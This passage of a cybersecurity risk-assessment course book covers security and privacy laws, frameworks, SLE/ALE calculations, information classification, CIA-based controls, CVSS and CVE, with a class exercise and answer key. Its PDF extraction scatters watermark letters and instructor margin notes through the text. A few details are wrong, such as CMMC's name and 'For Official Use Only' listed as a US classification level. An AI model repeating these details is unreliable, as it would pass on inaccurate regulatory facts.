reporting is accurate and complete, and can be applied to
orany cybersecurity system that is involved in financial

reporting.
OWASP
e
Although not technically a framework or standard, the Open Web Application Security Project
at
(OWASP) is a community effort that provides free access to a number of secure programming
resources and best practices. The most prominent of OWASP's resources is their Top 10 Project,
lic
which lists the most significant risks to web apps in a particular calender year. The latest Top 10 was
published in 2017.
Cloud Security Alliance (CSA)

up
The Cloud Security Alliance (CSA) is another organization that exists to promote best practices in
cybersecurity, particularly when it comes to cloud computing. The CSA is a coalition of several
member organizations, including Google™, Microsoft®, Huawei®, Oracle®, and more. The CSA
D
has several working groups that research cloud security topics for both providers and consumers,
including education and training, tools, processes, and defensive strategies.
ot
Security Laws and Regulations

N
Security Laws and Standards, frameworks, and best practices are optional for the organization to follow, though they
Regulations are a great help to the risk assessment process. However, there are various laws and regulations an
organization is required to follow that also have an impact on risk assessment.
o
The following table lists some of the major laws and industry regulations that you may need to
D
comply with.

Law or Regulation Description
SOX The Sarbanes–Oxley Act (SOX) of 2002 is a U.S. law that dictates
requirements for the storage and retention of documents relating to an
organization's financial and business operations, including the type of
documents to be stored and their retention periods. It is relevant for any
publicly traded company with a market value of at least $75 million.
FISMA The Federal Information Security Management Act (FISMA) of 2002 was
passed in the United States to address the evolutionary nature of
e
information systems security in the federal government. Some of the act's
ut
key provisions require federal organizations to:
• Define the boundaries of the systems to be protected and then
identify the types of information found within those systems.
ib
• Document system information and perform a risk assessment to
identify areas requiring additional protection.
tr
• Protect systems using an identified set of controls and certify systems
before use. An approval for operation is issued upon certification.
is
• Continuously monitor systems for proper operation.
FISMA was amended in 2014 to bolster the federal government's ability
D
to respond to attacks on its departments and agencies.
CMMC The Cybersecurity Model Maturity Certification is a framework
announced in 2019 for training, assessing, and certifying organizations
or
that contract with the U.S. government. Such organizations must be
certified by a third party as having met the cybersecurity standards set
forth by the Department of Defense (DoD) and an accreditation board of
e
security professionals. Although the CMMC program is currently a DoD-
specific requirement, it may eventually be mandatory for all government
at
contractors—civilian or military—to achieve this certification.

Computer Misuse This UK act, introduced in 1990, makes provisions for securing computer
lic
Act material against unauthorized access or modification. The act introduced

three criminal offenses, the aim being to deter criminals from using a
computer to assist in the commission of a criminal offense. The key
up
offenses are:
• Unauthorized access to computer material.
• Unauthorized access with intent to commit or facilitate commission of
D
further offenses.
• Unauthorized modification of computer material.
ot
Privacy Standards and Frameworks

N
Privacy and security are intertwined, as the former depends on the latter. Still, privacy concerns are Privacy Standards and
sometimes broken out into their own category for the sake of focusing on issues that affect the Frameworks
secrecy of personal data. The following table describes some standards and frameworks that focus
o
primarily on data privacy.

D

NIST Privacy Framework NIST publishes the Privacy Framework to help

organizations identify and manage risks to data privacy. It
encourages organizations to build customer trust, fulfill their
compliance obligations, and communicate their practices to
outside parties.
The Privacy Framework follows the same general structure
as the Cybersecurity Framework, incorporating the "Core,"
e
"Profile," and "Tiers" sections. The first and latest version
ut
was published in 2020.
ISO/IEC 27000 series Although much of the ISO/IEC 27000 series is relevant to
protecting data privacy, there are several publications that
ib
focus on data privacy specifically, including ISO/IEC
27018, ISO/IEC TS 27110, ISO/IEC 27701, and ISO
tr
27799.
ISO/IEC 29100 The 29100 standard, Information technology — Security techniques
is
— Privacy framework outlines common terminology for
privacy, the roles and responsibilities of those involved in
D
protecting privacy, controls for safeguarding privacy, and
references to known best practices for privacy.
The most recent version was published in 2011, though it
GAPP
or
was last reviewed and confirmed in 2017.
Generally Accepted Privacy Principles (GAPP) was a joint
effort by the AICPA and the Canadian Institute of
e
Chartered Accountants (CICA)—now the Chartered
at
Professional Accountants of Canada (CPA of Canada)—to

provide guidance to chartered accountants (CA) and
certified public accountants (CPA) in maintaining the
lic
security of personally identifiable information (PII).

GAPP defines ten principles, including: management;
notice; choice and consent; collection; use, retention, and
up
disposal; access; disclosure to third parties; security for

privacy; quality; and monitoring and enforcement. GAPP
was last updated in 2009.
D
Federal Trade Commission

The U.S. Federal Trade Commission (FTC), aside from enforcing certain laws, also provides
ot
guidance to both public and private organizations regarding data privacy for consumers. For
example, the publication Start with Security: A Guide for Business outlines general best practices for
upholding the privacy of user data. The FTC also promotes best practices in specific contexts, like
N
mobile health apps, Internet of Things (IoT) devices, and more.

o
Privacy Laws and Regulations

D
Privacy Laws and The following table describes major laws and regulations that have a focus on data privacy.
Regulations

HIPAA The Health Insurance Portability and Accountability Act (HIPAA) was
enacted in 1996 to establish several rules and regulations regarding
healthcare in the United States. With the rise of electronic medical
records, HIPAA standards have been implemented to protect the privacy
of patient medical information through restricted access to medical
records and regulations for sharing medical records.
GLBA The Gramm–Leach–Bliley Act (GLBA) of 1999 was primarily passed as a
e
deregulation of banks in the United States, but also instituted
ut
requirements that help protect the privacy of an individual's financial
information that is held by financial institutions and others, such as tax
preparation companies. The privacy standards and rules created as part of
ib
GLBA safeguard private information and set penalties in the event of a
violation. GLBA also requires a coherent risk management and
information security process.
tr
COPPA The Children's Online Privacy Protection Act (COPPA) is a U.S. federal
is
law passed in 1998 that stipulates what actions a website operator must
take to protect the personal data of children under the age of 13. This
includes displaying a privacy policy, obtaining consent from the child's
D
parent or guardian, and securing personal data in both storage and use.
COPPA also applies to children outside the U.S. if the organization that
handles their data is based in the U.S.
CAN-SPAM or
The Controlling the Assault of Non-Solicited Pornography and Marketing
(CAN-SPAM) Act is a U.S. federal law passed in 2003 that sets rules for
entities sending commercial email. There are several rules that prohibit
e
the spread of false or misleading information in email headers, deceptive
subject lines, and messages that don't properly self-identify as
at
advertisements. CAN-SPAM requires commercial entities to make it clear

and easy for recipients to opt out of all email messages, protecting private
lic
email accounts from unwanted messages.

PIPEDA Canada's Personal Information Protection and Electronic Documents Act
(PIPEDA), enacted in 2001, establishes various principles that
up
organizations must follow in the collection, use, and disclosure of

personal information. PIPEDA initially applied to private organizations
that are federally regulated and was updated in 2004 to apply to all other
D
organizations, bringing Canada into compliance with European Union

(EU) privacy regulations.
Data Protection Act The UK's Data Protection Act makes new provisions for the regulation
ot
of the processing of information relating to individuals, including the

obtaining, holding, use, or disclosure of such information. The act
comprises eight core principles that focus on the accuracy and
N
confidentiality of personal data kept by organizations, as well as the

organization's necessary levels of security to assure that personal data is
o
not compromised.
D


GDPR The General Data Protection Regulation (GDPR), which went into full
effect in the European Union in 2018, regulates the export of personal
data outside the EU. It is intended to protect individual privacy by
holding data collection and data processing entities accountable for the
information of EU citizens. The regulation applies to all entities that
collect or process the personal data of EU citizens, even if the entity is
not based in the EU.
e
The GDPR ultimately upholds the privacy rights of individuals (e.g., the
ut
right to correct inaccurate personal data), enforces restrictions and
security obligations for organizations (e.g., report data breaches within 72
hours), and issues penalties for non-compliance (e.g., fines up to €20
ib
million or 4 percent of global turnover).
PCI DSS The Payment Card Industry Data Security Standard (PCI DSS) is a
tr
proprietary standard that specifies how organizations should handle
information security for major card brands that include Visa, MasterCard,
is
American Express, Discover, and JCB (formerly Japan Credit Bureau), all
of which provide a mandate for the standard.
D
The standard is intended to increase controls on cardholder data to
reduce fraudulent use of accounts. Although not technically a law or
regulation, organizations or merchants that accept, transmit, or store
or
cardholder data (regardless of size or number of transactions) must
comply with this standard or face penalties.
Personal Information Protection Law of the People's Republic of China (PIPL)

e
The government of China passed a privacy law in 2021 that outlines rules for individuals and
at
organizations handling the personal information of Chinese citizens.

lic
New and Changing Factors That Impact Risk

New and Changing Most industries—particularly those in computing technologies—are constantly evolving at a rapid
up
Factors That Impact rate. Likewise, the risks to those industries change just as quickly. As you assess risk in your
Risk organization, you should consider various factors that may have changed or will soon change that
could have an impact on your efforts.
• New and changing business strategies. As the world changes, it brings about new forms of
D
doing business. Today's interconnected world offers rich opportunities for companies to partner
with other organizations, outsource their operations, rely on cloud providers for support, and
merge and demerge assets with other business entities.
ot
• De-perimeterization. De-perimeterization is the process of shifting, reducing, or removing

some of the organization's boundaries to facilitate interactions with the world outside its domain.
N
Examples of de-perimeterization include remote work, reliance on cloud services and other
outsourcing opportunities, and the bring your own device (BYOD) phenomenon.
• User behaviors. Users often present the largest risk to an organization. Users have access to
o
data, are usually not as technically savvy as systems administrators or security personnel, and are
frequently targeted by attackers through the use of social engineering methods. In a world of
D
remote work and online collaboration, users will change how they interact with each other and
the organization’s resources.
• New productions and technologies. As new products are used by an organization, new
vulnerabilities and threats are introduced, which increases risk. Similar to new products, new
technologies must be evaluated for vulnerabilities and threats, but one technology might have
markedly different risks from another. For example, mobile computing platforms like tablets and

smartphones suffer from similar risks to traditional desktops, such as buffer overflows, yet have
new risks, such as the ease of loss due to their small size and mobility.
• New threats. Attackers are constantly inventing new attacks, and how organizations conduct
business is always changing. This cycle of recurring change introduces new threats into an
organization, and thus new risks. For example, if a new weakness is found in an encryption
protocol such as Secure Sockets Layer/Transport Layer Security (SSL/TLS), the
organization will need to determine how to patch its systems or mitigate the threat in another
way.
e
Internal and External Influences
ut
Many different types of events influence risk. Some of these influences are internal and some are Internal and External
external to the organization. You should assess how each influence aids or detracts from the risk Influences
ib
management process.
Influence Type Risk Assessment Relevance
tr
Internal compliance Internally, all the employees of an organization are stakeholders
is
concerned with the safety and security of the organization. When senior
management signs off on a risk management plan, everyone should be
expected to assist with its implementation; that is, be in compliance with
D
the plan. This is not always easy to do, as a great deal of training may be
required and numerous policies and procedures may be put in place to
ensure full compliance.
or
When done properly, internal compliance assessments can identify
controls that are not operating as intended and are not reducing the risk
to acceptable levels. Since internal users bring a high degree of risk to an
e
organization's network and systems, including them in your assessment of
risk will produce more accurate results. After all, they are the ones who
at
access and use those systems on a daily basis and can help identify areas
where additional risk treatment is necessary.
lic
External compliance All businesses must comply with external regulatory entities. It is
important that your organization follows all applicable laws, regulations,
and standards. The federal government will, for example, enforce HIPAA
up
in U.S. organizations that work in the healthcare industry. Even standards

that are not necessarily legally binding, like those enforced by the ISO, are
ubiquitous in the industry.
D
Although the goal of compliance regulations is to provide a minimum

acceptable baseline for managing risks in a particular industry or
organization, most regulations do not place requirements on the
ot
effectiveness of a control, but instead on whether or not the control is

present. Without measuring a control and applying a baseline to the
regulation, it is impossible to determine if the controls are effectively
N
deployed within the organization. This is why simply being compliant will
not necessarily produce an optimum risk assessment. Your organization
may be compliant but still may not be as secure as it should be under the
o
intent of the regulation or standard.

D
Internal client Internal clients are often stakeholders in risk management planning and
requirements implementation because they are direct users of corporate resources.
Internal clients should be involved in risk assessment, as they are at the
forefront of recognizing risks that impact the organization. If they are not
involved, it will be impossible to secure their environments, which in turn
will lead to client dissatisfaction and reduced customer business.

Influence Type Risk Assessment Relevance

External client The involvement of external clients depends on their needs. External
requirements clients have a vested interest in the ongoing activities of the organization
with which they conduct business. In that regard, they are another front-
line resource for identifying the threats and vulnerabilities of the business.
At the same time, external clients who are part of risk management
planning for their trading partners might demand that the risk
management plan include business continuity protocols so that their
e
source of supply can continue in the event of a loss. They might also
ut
insist on measures that protect the confidentiality they share with their
trading partners. Because of this vested interest, external clients can
provide insight on the ways to assess risk in an organization that has
ib
business relationships.
Audit findings Audit findings influence risk by providing evidence that controls are
tr
adequate in reducing or eliminating risk. Where an auditor's results are
below acceptable thresholds, the organization should assess the risk and
is
determine if mitigation, transfer, or acceptance is the correct approach.
In some cases, it is impossible to reduce risk further; for example, where
D
the use of legacy systems is required as part of an established business
function. In cases such as this, it may be necessary to change the business
process or outsource the function entirely to avoid the risk. Likewise, it
Top-level
management
or
may be necessary to rethink your technology infrastructure.
Top-level management is one of the key stakeholders in the risk
assessment process. Without proper risk assessment, they will be unable
e
to make informed decisions about how to operate the business. When
presenting both internal and external risk to executive management,
at
quantitative analysis and accurate metrics are two of the key components
that you must communicate effectively. When this is done, it will be easier
for you to get buy-in from executive management for risk mitigation
lic
plans and the appropriate funding of security initiatives.

Competitors Competitors can drive changes in business. In order to stay competitive,
the organization may develop new products, incorporate new technology,
up
and expand customer markets. All of these activities bring their own risk
to the organization.
D
System-Specific Risk Analysis

ot
System-Specific Risk To understand the risks to an organization, a security professional must be able to analyze the
Analysis organization's systems to understand how those systems are used and how the confidentiality,
Consider asking integrity, and availability (CIA) of the systems are threatened. A number of different frameworks
N
students which and processes have been established to assist this analysis. Although how you go about your analysis
questions are most will differ with respect to what you're analyzing, the following are some common questions to ask
important to them. when trying to quantify a risk:
o
• How can an attack be performed?

D
• Can the attack be performed in the current network, and are the assets accessible?
• Can the requirement for authentication reduce the possibility of attack?
• What is the potential impact to the confidentiality, integrity, and availability of the data?
• How exploitable is the flaw? Is it theoretical or does a working exploit exist?
• Are there workarounds or patches available?
• How confident is the report of the vulnerability? Is it an established and tested approach?
• What could be the potential damage to the organization?

• How many targets exist within the organization?

• What are the confidentiality, integrity, and availability requirements for the assets in question?
• How likely is the risk to manifest itself?
• What mitigating protections are already in place? How long will it take to put additional controls
in place? Are those additional protections cost effective?
• How can you translate technical risks into terms of how they could occur and what the effect
would be on the business (for example, loss of revenue, reputation, legal repercussions)?
Examples of System-Specific Risk Analysis
e
If, for example, your organization is a cloud provider with multiple sites worldwide, your analysis
ut
should focus on the chances of an attack succeeding, what an attack can compromise in terms of the
data you host and its availability to your customers, and how exactly an attack can be performed. In
this scenario, patches and software fixes may be irrelevant to stopping an attack, so you won't
ib
necessarily focus on that in your analysis. Likewise, you may be less concerned with the cost
effectiveness of any controls, since you have a considerable security budget.
tr
If your organization is small and has primarily local customers, you'll want to approach your analysis
differently. Cost effectiveness becomes a significant factor in security controls, as your budget will
is
likely be limited. Also, you may want to focus more on the damage an attack will do to your own
systems, since you're unlikely to have the amount of redundancy that a large organization will.
D
The point is, before you even begin your risk analysis, you should tailor it to your own situation to
maximize its efficacy and dispense with irrelevant factors.
Risk Determinations or
A significant part of risk assessment is determining just how certain risks can specifically impact the Risk Determinations
e
organization. Two influential factors in risk determination are the likelihood of threats and the Consider pointing out
magnitude of impact. that a lot of research and
at
analysis goes into each

You can determine the likelihood of a threat bringing risk to your organization by using the
element of these
following methods: formulas, so calculating
lic
• Discovering the threat's motivation, if it has any. What does an attacker stand to gain from SLE and ALE may not
conducting an attack? Note that some risks, like accidents and non-human factors (e.g., fires and be as easy as it looks.
floods) have no motivation. Consider placing these
up
• Discovering the source of the threat. Who is the threat? Is it an individual or a group? Where are formulas in a real-world
context for students. For
they from, and what is their experience?
example, what is the
• Determining the threat's annual rate of occurrence (ARO). How often does the threat asset value of their car,
successfully affect the organization?
D
and how likely is it to

• Conducting a trend analysis to identify emerging threats and threat vectors. How effective are receive damage? They
these threat vectors, and how have they been exploited before? can use this information
to determine their loss
ot
A quantitative assessment of risk attempts to assign a monetary value to the elements of risk, as in expectancy for the risk
the following formula: of a car crash.
N
AV (Asset Value) × EF (Exposure Factor) = SLE (Single Loss Expectancy)

The single loss expectancy (SLE) value represents the financial loss that is expected from a
specific adverse event. The exposure factor is the expected percentage of the total asset value that
o
will be lost if the risk is realized. So, if an asset is worth $10,000, but an adverse event only leads to
half of that being lost, then SLE is $10,000 × .50 = $5,000.
D
If you know how many times this loss is likely to occur in a year, you can calculate the cost on an
annual basis:
SLE (Single Loss Expectancy) × ARO (Annual Rate of Occurrence) = ALE (Annual Loss
Expectancy)

The annual loss expectancy (ALE) value is calculated by multiplying an SLE by its ARO to
determine the financial magnitude of a risk on an annual basis. So, if the example from before is
likely to occur three times in one year, the ALE would be $5,000 × 3 = $15,000.
Note: The ALE may be a moving target, as threats cannot necessarily be quantified as occurring
annually, but rather on an individual basis. In addition, threats change over time.
Documentation of Assessment Results
e
Documentation of During or after a risk assessment, you may be called upon to document your findings. To be
ut
Assessment Results effective, these reports must answer the following questions:
• Who asked you to perform the assessment?
ib
Use this question to create a record of who asked you to conduct the assessment. This will help
you establish a clear authority in writing, especially if personnel changes or if the business is
restructured during the assessment.
tr
• What were you asked to do?
is
Use this question to make clear exactly what you were told to assess. Going beyond the scope of
the assessment or failing to assess every element expected of you could impact your overall
conclusions.
D
• What did you assess?
Specifically mention any technological, administrative, or operational processes you assessed. It's
targets of the assessment.

• What did you do?
or
important this record is comprehensive and avoids vague references to assets, people, or other
This is where you outline your assessment methodology so the audience of your report can verify
e
the assessment's results as accurate and useful.
at
• What did you find?

In this part of the report, you'll include the immediate results of your assessment based on the
lic
steps you took earlier. Make sure to write clearly and consider the target audience's aptitude in
technology and business operations.
• What does it all mean?
up
This last question prompts you to piece all your findings together to offer a conclusion. What do
you believe happened, how did it happen, and who do you think is responsible? You cannot
necessarily rely on the audience of this report to draw their own conclusions; they'll likely be
looking for you to do that so they can verify the validity of those conclusions. Although these
D
conclusions may be subject to bias, if you support them with evidence, the arbiter(s) of the case
will be more inclined to agree.
ot
Guidelines for Assessing Risk

N
Guidelines for Assessing

Risk Note: All Guidelines for this lesson are available as checklists from the Checklist tile on the
CHOICE Course screen.
o
Follow these guidelines when you assess risk in the organization.

D
Assess Risk in the Organization

When assessing risk:
• Assess industry-accepted security and privacy frameworks and standards for how they may
benefit your organization.
• Identify security and privacy laws and regulations your organization is subject to.
• Evaluate new and changing business factors that could have an impact on risk.

• Consider how practices like remote work and BYOD may impact your organization's network
perimeter.
• Consider how internal and external compliance, internal and external client requirements, and
audit findings influence risk.
• Determine how risks can affect the CIA of specific systems in your organizational environment.
• Determine what a threat is, where it comes from, and what risk it poses to the organization.
• Calculate the SLE and ARO of a threat, and then use the product of these two values to obtain
your ALE.
• Document your assessment results clearly and comprehensively.
e
ut
ib
tr
is
D
or
e
at
lic
up
D
ot
N
o
D

ACTIVITY 1-2
Assessing Risk
Scenario
e
Now that you're aware of the importance of risk management, you'll want to begin by assessing risk
at Develetech to get a better picture of just how the business currently fares during its expansion.
ut
You'll also gain an understanding of how the evolving nature of technology will affect Develetech in
the future, and what sort of unique challenges this poses to your risk management strategy.
ib
Assessing risk on an organizational level will enable you to later address and mitigate those risks.
Activity: Assessing Risk
tr
1. Develetech is a U.S.-based company, but it does business all around the
world.
is
What laws and regulations might Develetech be subject to?
D
A: Answers will vary, but among those discussed in this topic, Develetech is likely subject to U.S.
laws like SOX and CAN-SPAM. Develetech probably doesn't handle health records, so HIPAA is
unlikely to be relevant. Develetech is also likely subject to GDPR since it does business all over
2.
or
the world, including the European Union.
You've identified compliance to be one of the biggest concerns for the

expansion.
e
at
How will both internal and external compliance factors influence your risk
assessment?
lic
A: Answers may vary. Your internal staff needs to comply with your risk management plan once it
has been put in place. This usually means training certain staff is required; otherwise, they might
not be properly equipped to meet compliance requirements. Because internal users access your
systems constantly, they can bring a great deal of risk. Externally, your organization must comply
up
with all applicable laws and regulations. Even failure to comply with non-legally binding, industry-
accepted standards may place your organization's finances or reputation in jeopardy. However,
external compliance will not guarantee security. You may find that your risk is still too high even
though you adhere to security requirements.
D
3. Develetech's main warehouse is worth $10,000,000 when including its

physical assets and the day-to-day operations it provides. There is a risk of
ot
the warehouse being partially destroyed in a flood. About 20% of the

warehouse and its operations will be lost in such an event. Based on where
N
Develetech is located, you estimate that a catastrophic flood is likely to occur

once every 10 years.
o
The correct answer is

derived from multiplying What is the annual loss expectancy (ALE) for a flood damaging the
D
$10,000,000 (asset warehouse?

value) by .20 (exposure
factor) to get the SLE,
○ $800,000
then multiplying the SLE ○ $200,000
by .10 (ARO).
○ $5,000,000
○ $20,000,000

TOPIC C
Mitigate Risk
After assessing how particular elements in your operations can bring risk to the organization, you're
ready to actively respond to those risks. Mitigation is all about balancing your response capabilities
with your tolerance for risk, and there are several different approaches that may work best for you.
e
As an information assurance professional, you'll choose the most appropriate mitigation strategy to
keep your organization as safe from harm as possible.
ut
Classes of Information
ib
When developing a risk mitigation strategy, you need to classify the information that needs to be Classes of Information
protected. The requirements to protect information will differ between jurisdictions, so you must
tr
There are several
examine the applicable regulatory requirements to ensure the classification takes this into account. different classification
Some information is more or less critical than other types. In addition to meeting compliance schemes, and students
is
requirements, classifying information can also help you determine what controls to apply. may be more familiar
with others. Consider
In general, there are four classes of information that organizations use:
D
asking students about
• Public information, which presents no risk to an organization if it's disclosed, but does present a their experience with
risk if it's modified or not available. information
classification, and
it, if it were modified, or if it were not available. or
• Private information, which presents some risk to an organization if competitors were to possess
• Restricted information, which might be limited to a very small subset of the organization
primarily at the executive level (e.g., corporate accounting data), where unauthorized access to it
incorporate their
answers into the rest of
the subject matter.
e
might cause a serious disruption to the business.
at
• Confidential information, which would have significant impact to the business and its clients if
it were disclosed. Client account information like user names and passwords, personally
identifiable information (PII), protected health information (PHI), payment card information/
lic
cardholder data (CHD), and personal data covered by the UK's Data Protection Act would be in
this category.
up
D
ot
N
o
D
Figure 1-4: Classes of information.
Lesson 1: Assessing Cybersecurity Risk | Topic C

U.S. Military Classification System

Military classifications are defined and implemented by the U.S. federal government to categorize
sensitive information that requires protection. The assigned classification level is determined by the
level and magnitude of damage to the country's national security if the information falls into the
wrong hands or becomes public. The classification levels can vary between countries. The
classification level controls who can access the information and the restrictions for how the
information is handled. From most restrictive to least, the U.S. military levels of classified
information are:
e
• Top Secret
• Secret
ut
• Confidential
• For Official Use Only
ib
Executive Order 13526 outlines these classification levels and can be viewed at https://
www.archives.gov/isoo/policy-documents/cnsi-eo.html.
tr
UK Government Classification System
is
In the UK, a similar classification system is implemented. The UK government policy describes how
it classifies information to ensure it is appropriately protected, supports public sector business and
the effective use of information, and meets the requirements of relevant legislation and
D
international/bilateral agreements and obligations. As with the U.S. system, the classification is
determined by the likely impact resulting from compromise, loss, or misuse of the information and
the need to defend against a broad profile of threats. For each classification, there is a set of baseline
or
personnel, physical, and technical controls considered to provide an appropriate level of protection
against a defined "typical" threat level. From most restrictive to least, the UK government levels of
classified information are:
e
• Top Secret
• Secret
at
• Official
The published UK policy on classification levels can be viewed at https://www.gov.uk/
lic
government/publications/government-security-classifications.
Classification of Information Types into CIA Levels

up
Classification of Information is not categorized by access levels only; it can also be thought of in terms of how a
Information Types into compromise of that information can negatively impact the three core security attributes of the
D
CIA Levels confidentiality, integrity, and availability (CIA) triad. When surveying information within an
organization, it is important not to solely judge the type of information, but how that information is
used throughout the business as well. Public information, if disrupted, wouldn't necessarily cause
ot
problems from a confidentiality perspective. However, availability may drop significantly,

compromising a very crucial part of any organization's security focus. Ultimately, you should
investigate how each data category in your organization fits into the larger three goals of security so
N
that you may be better prepared to respond to risk.

Consider mentioning
that availability is often Note: The CIA triad is sometimes referred to as the AIC triad, CAI triad, etc., to differentiate it
o
not just the domain of from the U.S. Central Intelligence Agency.
security, but also
D
includes operational
departments.

e
ut
ib
tr
is
D
Figure 1-5: The CIA triad.
Example
or
Imagine a large outsourcing company that runs payroll applications for its clients. This outsourcing
provider would have massive quantities of confidential information, including names, addresses,
e
bank account and routing numbers, Social Security numbers, and tax return data. It may also have
self-administered health plan data that would be classified under HIPAA as PHI, bringing a
at
regulatory and compliance element to its operations as well.

Now contrast that organization against a small company, where such data would be relative to the
lic
size of the company and there would be little to no required uptime to support it. By comparing
these two companies, you can see how organizational perspective and scope can increase or
decrease the risks associated with different types of data. While penalties and liability associated with
up
a confidentiality and integrity breach of the payroll records would affect either organization, the
outsourcing provider has significantly more at stake. Not only would brand damage result from the
outsourcing provider's exposure or loss, but they would also lose immediate income through the
refund component of their service-level agreement (SLA).
D
The smaller organization may be penalized for exposing data or failing to protect it from tampering;
however, compared to the larger payroll provider, the smaller organization has less at stake.
ot
Security Control Categories

N
Many of your risk mitigation efforts will be put in motion by the various security controls you Security Control
implement. These controls will come in many different forms and have many different functions. Categories
o
The three main categories of security controls are as follows: The following
information should serve
• Technical
D
as a refresher for most

Technical controls, also called logical controls, are hardware or software installations that are students.
implemented to monitor and prevent threats and attacks to computer systems and services. For Point out that controls
example, installing and configuring a network firewall is a type of technical control. can be categorized in a
• Physical variety of ways and that
this is just one common
Physical controls are security measures that restrict, detect, and monitor access to specific example.
physical areas or assets. For example, placing locks on a door is a type of physical control.

• Administrative
Administrative controls, also called management controls or operational controls, monitor
an organization's adherence to security policies and procedures. For example, a regularly
scheduled security scan and audit to check for compliance with security policies is a type of
administrative control.
A large part of evaluating and mitigating risk in the organization is to review the effectiveness of
existing controls from all these categories, as well as any controls the organization may consider
adding to its risk management program.
e
Control Selection Based on CIA Requirements
ut
Technical Controls Once a specific risk has been quantified, it is possible to determine the best approach to mitigating
ib
(Template) the specific risk through various controls. Risks can be mitigated based on the specific CIA attribute
Technical Controls targeted, and the technology used to reduce the risk does not always cover all three attributes.
(Example Answer) Consider the following table, in which examples of technical controls are reviewed and selected in
tr
Use the template slide to terms of how they do or do not uphold the CIA principles.
prompt students to
is
provide their own Technical Control Upholds Upholds Integrity? Upholds
answers. Use the next Confidentiality? Availability?
slide to provide an
D
example of how they User permissions for Yes, by keeping No No
could fill in the table. network share unauthorized users
from accessing shared
Load balancers for web No

servers
data
or No Yes, by routing
traffic to hosts
e
that are
available and
at
have capacity
Message authentication No Yes, by comparing the expected No
lic
codes (MACs) used in message digest with the actual

digital signatures message digest upon output
up
As you can see, no single technology in this list of examples addresses all three attributes. An
organization has well-rounded security when it specifically upholds all three components of the CIA
triad. Keep in mind, however, that CIA attributes are not the only criteria by which you can select
the optimal controls for your organization. Ultimately, your organization must define which
D
parameters it needs to uphold to mitigate risk, and this will drive your process for selecting the right
controls.
ot
Application of Controls That Address CIA Requirements

There are several approaches you can use to address risks to confidentiality; for example, encryption
N
and access control. In both cases, the goal is to limit the readability of data to only authorized
parties. What you implement will depend on your needs as an organization. Access control may be
enough to keep unwanted users from accessing somewhat sensitive data, but in scenarios where data
o
is much more sensitive, you may want to aim for encryption to achieve the strongest confidentiality
assurances.
D
Controls to address risks to integrity primarily rely upon data validation and auditing. This includes
the use of read-only data stores and strong authentication controls in applications using multiple
factors. Auditing controls function by monitoring the integrity of the data as it exists in the system
and as data is passed through input and output routines. Auditing is a useful policy for essentially all
organizations, though it isn't as active in maintaining integrity as forms of validation like hashing.

Most commonly, organizations implement redundancy measures to mitigate hardware failures,

which have a serious impact on availability. By using failover techniques such as active–passive and
active–active, it is possible to seamlessly fail over to backup hardware. However, not all threats are
caused by hardware failure. In some situations, the consumption of resources is responsible for the
system becoming unavailable. An example of this would be a DoS attack that leverages a flaw in the
software to consume resources beyond the intended limits of the system or architecture. Once
started, a DoS attack can be very difficult to recover from. There are various flood control
mechanisms that may prevent successful DoS attacks, such as load balancers.
e
Risk Scoring Systems
ut
Once information critical to the business has been classified by the risk associated with its CIA Risk Scoring Systems
attributes, and stakeholder input and technical controls are considered in the context of the CIA
ib
triad, it is possible to develop risk scores for the data. This is done subjectively and is based on a
sliding scale of harm to the business.
tr
One example is to rate the highest risks a 10, the lowest risks a 1, and the lack of risk a 0. These
values are typically assigned by the information owner or a cybersecurity practitioner charged with
evaluating risk. This is a simple method of scoring that can be useful at the preliminary stages of risk
is
management, but you should eventually rely on more sophisticated scoring systems that can more
precisely quantify risk. There are several such scoring systems accepted by the cybersecurity
D
community, and some of them have overlapping methodologies. There is not one authoritative
source of record for all risks.
The value of any scoring system is to rank the severity of risks so that you can more confidently
or
prioritize some risks over others. By prioritizing risks and your responses to them, you will be more
effective at reducing their likelihood and impact than if you chose to address the risks in an arbitrary
order or by the order in which they are identified.
e
Articulate Risks Using Business Language
at
To ensure the business stakeholders understand the risks, in addition to calculating risk scores, you
should articulate the risk in business language such that the cause and effect can clearly be
lic
understood by the business owner of the asset. For example, a risk of a denial of service (DoS)
attack should be put into plain language that describes how the risk would occur and as a result what
access is being denied to whom and the effect to the business. For instance: "As a result of
up
malicious or hacking activity against the public website, the site may become overloaded, preventing
clients from accessing their client order accounts. This will result in a loss of sales for n hours and a
potential loss of revenue of n dollars."
D
Common Vulnerability Scoring System (CVSS)

Risk scores depend on the integrated concept of risk. Vulnerabilities are a big part of that concept.
ot
Common Vulnerability
Most vulnerabilities today are rated using the Common Vulnerability Scoring System (CVSS). Scoring System (CVSS)
The CVSS is a risk management approach where vulnerability data is quantified and then the
N
degrees of risk to different types of systems or information are taken into account. Since it is an
open source formula for risk quantification, the CVSS is easily modified to fit a specific
organization's needs. The CVSS is similar to the examples used previously, but it is much more
o
granular.
The system consists of the three core metric groups (and their associated sub-metrics): base metrics
D
that characterize fundamental components of a vulnerability, temporal metrics that qualify

components of a vulnerability that change over time, and environmental metrics that qualify
components of a vulnerability that depend on specific contexts and implementations. The following
table lists these metrics and sub-metrics for version 3.1 of the CVSS.

Base Metrics Temporal Metrics Environmental Metrics
Attack vector Exploit code maturity Modified base metrics

Attack complexity Remediation level Confidentiality requirements
Privileges required Report confidence Integrity requirements
User interaction Availability requirements
Confidentiality impact
e
Integrity impact
ut
Availability impact
Scope
ib
Time permitting, The strength of the CVSS is that it produces consistent results for the vulnerability's threat in the
consider demonstrating base and temporal metric groups, while enabling organizations to match those results with their
tr
the CVSS calculator. specific computing environment. You can do this by using the CVSS calculator (available at
https://nvd.nist.gov/cvss.cfm?calculator&version=3.1) and plugging in your own metric
is
values.
D
Common Vulnerabilities and Exposures (CVE)
Common Vulnerabilities The CVSS is used to score vulnerabilities in the Common Vulnerabilities and Exposures (CVE)
and Exposures (CVE)
or
system, a public dictionary of vulnerabilities that facilitates the sharing of data among organizations,
security tools, and services. In a sense, the CVE normalizes data about a vulnerability so that fixing
or mitigating the issue is less of a challenge. The CVE is maintained by the non-profit MITRE
Corporation and receives funding from the U.S. Department of Homeland Security.
e
There are several elements that make up a vulnerability's entry in the CVE:
at
• Each vulnerability has an identifier that is in the format: CVE-YYYY-####, where YYYY is
the year the vulnerability was discovered, and #### is at least four digits that indicate the order
lic
in which the vulnerability was discovered.

• A brief description of the vulnerability.
• A reference list of URLs that provide more information on the vulnerability.
up
• The date the vulnerability entry was created.

D
ot
N
o
D

e
ut
ib
tr
is
D
or
e
Figure 1-6: CVE-2021-34527, which details a vulnerability in the Windows Print Spooler service
at
that enables an attacker to execute arbitrary code on a target host. This vulnerability, along with
